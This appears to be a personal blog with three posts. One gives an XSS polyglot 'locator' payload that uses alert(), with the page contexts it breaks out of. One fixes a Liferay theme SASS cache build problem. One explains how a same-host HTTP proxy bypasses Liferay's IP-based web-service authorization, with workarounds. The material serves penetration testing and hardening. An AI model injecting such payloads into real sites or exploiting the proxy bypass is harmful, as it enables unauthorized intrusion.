Thursday, December 5, 2013

My XSS Locator / Vector

toString()+alert(/xss/)+function(){/*'+alert(/xss/)+'"+alert(/xss/)+"--></style><img src=x onerror=alert(/xss/)>*/}

URL Encoded:
toString()%2Balert(%2Fxss%2F)%2Bfunction()%7B%2F*%27%2Balert(%2Fxss%2F)%2B%27%22%2Balert(%2Fxss%2F)%2B%22--%3E%3C%2Fstyle%3E%3Cimg%20src%3Dx%20onerror%3Dalert(%2Fxss%2F)%3E*%2F%7D


Pros
  • Able to exploit most places (the list is below)
  • Trying not to break JavaScript syntax
  • Easy to identify the vulnerable field (e.g. alert(/userMiddleName/))

Cons - too long for values which have length limit



List of exploitable places:
  • JavaScript/DOM XSS
    • var x="asdf<%= xssLocator %>xxx";
    • var y='asdf<%= xssLocator %>xxx';
    • opener.<%= xssLocator %>(some, arguments);
    • element.html(xssLocatorInput.value);
  • CSS XSS:
    • <style>a:after { content: '<%= xssLocator %>';}</style>
  • HTML Attribute XSS:
    • <a href="#" alt="<%= xssLocator %>">test</a>
    • <a href='#' alt='<%= xssLocator %>'>test</a>
  • HTML Body and Comments XSS
    • <%= xssLocator %>
    • <!-- <%= xssLocator %> -->

Thursday, March 21, 2013

Liferay Theme & SASS cache problems during build

Extending themes using Liferay Plugins SDK is simple.

Extending Classic theme is not - there is css/.sass-cache folder to cross your plans.

How to fix? Change build.xml file in your theme folder and override build-css target:

<?xml version="1.0"?>
<!DOCTYPE project>

<project name="test-theme" basedir="." default="deploy">
  <import file="../build-common-theme.xml" />

  <property name="theme.parent" value="classic" />

  <target name="build-css">
  <delete file="docroot/css/.sass-cache/main.css" />
  <ant 
            antfile="../build-common-theme.xml" 
            target="build-css" />
  </target>
</project>


Tuesday, February 19, 2013

HTTP mod_proxy + Liferay @ same server = security problem

Liferay use remote IP check for Web Services authorization. This check can be bypassed with wrong environment configuration.

The wrong configuration:
1, the web server is on the same machine as the app server (has same localhost / server IP)
2, the web server use HTTP proxy

What happens - HTTP request goes to the web server, which proxies the request to Liferay. Now remote IP = IP of the web server = localhost.

Risk
* Anyone can access remote web services
* Anyone can execute public remote methods, other methods require authentication. (Note: Starting with Liferay 6.1.1 / 6.1.20 all methods require authentication.)
* Anyone can execute brute-force attack on users' portal credentials to break the authentication, SSO settings are bypassed

Quick workaround - change:
*.servlet.hosts.allowed=127.0.0.1,SERVER_IP
to
 *.servlet.hosts.allowed=255.255.255.255

There is one drawback - you can't access Liferay Web Services from anywhere :)

Solution - move the web server into another machine or use AJP:
* load mod_proxy_ajp
* rewrite configuration to use ajp and port 8009 everywhere (8009 is Tomcat default). Example:
ProxyPass / ajp://localhost:8009/

Applies to Apache HTTP Server, nginx and, in fact, to any HTTP proxy server in this configuration.